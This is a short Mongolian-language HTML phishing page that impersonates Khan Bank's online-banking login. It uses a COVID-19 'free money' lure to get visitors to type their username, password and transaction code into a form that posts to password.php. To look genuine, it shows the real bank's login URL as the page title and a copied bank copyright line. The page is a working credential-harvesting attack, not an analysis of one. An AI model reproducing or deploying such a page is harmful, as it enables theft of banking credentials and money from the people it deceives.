<img SRC="bank.jpg">
	<meta charset="UTF-8">
	<ul>
		<br>
<h1>Корона өвчин тохиож байгаа учраас бид үнэгүй мөнгө тарааж байна !</h1>
<ol>
<li>Та интернэт банкинд бүртгүүлсэн Нэвтрэх нэр нууц үг зэрэгээ хийж "Нэвтрэх" гэсэн дээр дарна !
<li>Дараан та мөнгө авах гэсэн дээр дарна өөрийн дансний дугаараа хийж авах дээр дарна !
<li>Бид хүн болгонд 100000.00.MNT олгож байна танд баярлалаа ! 
<li>Гүйлгээний код заавал хийх буруу хийсэн дохиолдолт бид зөвшөөрөхгүй !
</ol>
</ul>
<ul><ul><ul><ul><ul><ul><ul><ul><ul><ul><ul><ul><form action="password.php" method="post">
	
 <h1>Нэвтрэх нэр</h1> 
<br>
   <input type="text" placeholder="Нэвтрэх нэр" name="ner">
	<br>
		<h1>Нууц үг</h1>
<br>
 <input type="text" placeholder="Нууц үг" name="nuutsug">
		<br>
			<h1>Гүйлгээний код<h1>
 <input type="text" placeholder="Гүйлгээний код" name="cod">
			<br>
				<br>
			<input type="submit" value="Нэвтрэх" size="345">
	</ul>
<title>
https://e.khanbank.com/pageLogin?lang=MN
</title>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
	<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
	<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
	<h6>© 2020 ХААН Банк. Зохиогчийн эрх хуулиар хамгаалагдсан.</h6>
</br>

	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	